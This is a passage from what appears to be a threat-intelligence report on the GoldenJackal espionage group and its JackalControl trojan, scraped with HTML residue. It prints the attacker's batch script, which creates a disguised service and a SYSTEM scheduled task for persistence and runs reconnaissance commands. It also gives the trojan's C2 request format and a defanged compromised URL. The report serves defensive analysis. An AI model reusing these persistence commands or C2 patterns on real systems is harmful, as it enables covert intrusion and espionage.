Based on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.<\/p>\n
Infection vectors<\/h2>\n
We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.<\/p>\n
The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business standalone installer. This tool was used in 2020.<\/p>\n
The other known infection vector was a malicious document that uses the remote template injection technique to download a malicious HTML page, which exploits the Follina vulnerability<\/a>.<\/p>\n Malicious document \u2013 first page<\/em><\/strong><\/p>\n The document was named “Gallery of Officers Who Have Received National And Foreign Awards.docx” and appears as a legitimate circular distributed to collect information about officers decorated by Pakistan’s government. It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.<\/p>\n The document was configured to load an external object from a legitimate and compromised website:<\/p>\n hxxps:\/\/www.pak-developers[.]net\/internal_data\/templates\/template.html!<\/p>\n Code snippet used to load the remote resource<\/em><\/strong><\/p>\n The remote webpage is a modified version of a public “Proof of Concept<\/em>” to exploit the Follina vulnerability. The original PoC is available on GitHub<\/a>. The attacker replaced the IT_BrowseForFile variable value with the following:<\/p>\n Code snippet used to exploit the Follina vulnerability<\/em><\/strong><\/p>\n The decoded string is:<\/p>\n Decoded script<\/strong><\/em><\/p>\n The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: “%Temp%\\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.<\/p>\n In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.<\/p>\n The batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system.<\/p>\n This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel facilitated between the malware and the C2 servers, and can instruct the implant to conduct any of the following operations:<\/p>\n During the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are going to describe the latest version, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).<\/p>\n The Trojan is an executable file that can be started as a standard program or as a Windows service.<\/p>\n It expects an argument, which can be equal to one of the following values:<\/p>\n The malware arguments and the related malware behavior change according to the variants. Some variants offer only two arguments:<\/p>\n Other variants can install themselves with different persistence mechanisms. The malware’s execution flow is determined by the arguments provided in the command line with which it is run.<\/p>\n Over the years the attackers have distributed different variants: some include code to maintain persistence, others were configured to run without infecting the system; and the infection procedure is usually performed by other components, such as the batch script mentioned above.<\/p>\n The malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised system. This value is derived from several other host-based values:<\/p>\n The UUID value obtained from the following WMI query:<\/p>\n The machine GUID obtained from the following registry key:<\/p>\n The list of attached drives, obtained from another WMI query, which in turn allows them to determine the ‘SerialNumber’ of ‘PHYSICALDRIVE0’:<\/p>\n The collected information is concatenated together in a byte array and then hashed with MD5, which is used as a seed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two consecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the final BOT_ID. This logic is described in the code snippet below, taken from the malware.<\/p>\n Code snippet used to generate the BOT_ID<\/em><\/strong><\/p>\n The resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt communication with the C2.<\/p>\n The malware communicates using HTTP POST requests where data arguments will be carried in encoded form as part of the request’s body. The overall request structure will then appear as follows:<\/p>\n A valid response should in turn be formed in the following way:<\/p>\n The response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the standard Windows new line sequence \u2013 “\\r\\n”. Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.<\/p>\n Each command has the following structure:<\/p>\n Command structure<\/em><\/strong><\/p>\n The command type must be equal to one of the following codes:<\/p>\n![\"Malicious](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16214756\/GoldenJackal_APT_01.png\")
<\/a><\/p>\n![\"Code](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16214843\/GoldenJackal_APT_02.png\")
<\/a><\/p>\n![\"Code](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16214917\/GoldenJackal_APT_03.png\")
<\/a><\/p>\n![\"Decoded](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16214956\/GoldenJackal_APT_04.png\")
<\/a><\/p>\ncmd \/c \"c:\\windows\\temp\\install.bat > c:\\windows\\temp\\output.txt\"<\/pre>\n
$temp\\\\dnf4.exe \/q \/norestart\r\ntasklist\r\nsc qc \"WEvMngS\"\r\nsc stop \"WEvMngS\"\r\nsc delete \"WEvMngS\"\r\nsc create \"WEvMngS\" binpath= \"\\\"$windir\\WEvMngS.exe\\\" \/1\" displayname= \"Windows\r\nEvent Manager\" type= own start= auto\"\r\nsc description \"WEvMngS\" \"Provides event-related methods that register routed\r\nevents.\"\r\nsc start \"WEvMngS\"\r\nschtasks \/delete \/f \/tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\nschtasks \/create \/f \/tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\" \/xml\r\n\"$temp\\\\sch.xml\" \/ru \"NT AUTHORITY\\SYSTEM\"\r\nsc qc \"WEvMngS\"\r\nschtasks \/query \/v \/fo list \/tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\ntasklist\r\nnetstat -aon\r\nping -n 1 google.com\r\nipconfig \/displaydns\r\nnetsh winhttp show proxy\r\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" \/v\r\n<\/pre>\n
JackalControl<\/h2>\n
\n
\n
\n
\n
select * from win32_computersystemproduct<\/pre>\n
select * from win32_computersystemproduct<\/pre>\n
select * from win32_diskdrive<\/pre>\n
![\"Code](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16215704\/GoldenJackal_APT_05.png\")
<\/a><\/p>\nPOST \/wp-includes\/class-wp-network-statistics.php HTTP\/1.1\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko\/20100101\r\nFirefox\/68.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\r\nContent-Type: multipart\/form-data; boundary=----2c0272b325864985abf2677460a9b07a\r\nAccept-Language: en-GB,en;q=0.5\r\nUpgrade-Insecure-Requests: 1\r\nCache-Control: max-age=0, no-cache\r\nPragma: no-cache\r\nHost: finasteridehair[.]com\r\nContent-Length: 154\r\nExpect: 100-continue\r\n\r\n------2c0272b325864985abf2677460a9b07a\r\nContent-Disposition: form-data; name=\"adv\"\r\n%ENCODED_DATA%\r\n------2c0272b325864985abf2677460a9b07a\r\n<\/pre>\n
<!-- DEBUGDATA::%ENCODED_DATA% --><\/pre>\n
![\"Command](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16220013\/GoldenJackal_APT_06.png\")
<\/a><\/p>\n
![\"\"](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16220318\/GoldenJackal_APT_07.png\")
<\/a><\/li>\n![\"\"](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16220338\/GoldenJackal_APT_08.png\")
<\/a><\/li>\n![\"\"](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16220355\/GoldenJackal_APT_09.png\")
<\/a><\/li>\n<\/ul>\n![\"Infected](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/16221605\/GoldenJackal_APT_10.png\")
<\/a><\/p>\n![\"Geography](\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2023\/05\/22142912\/GoldenJackal_APT_11.png\")
<\/a><\/p>\n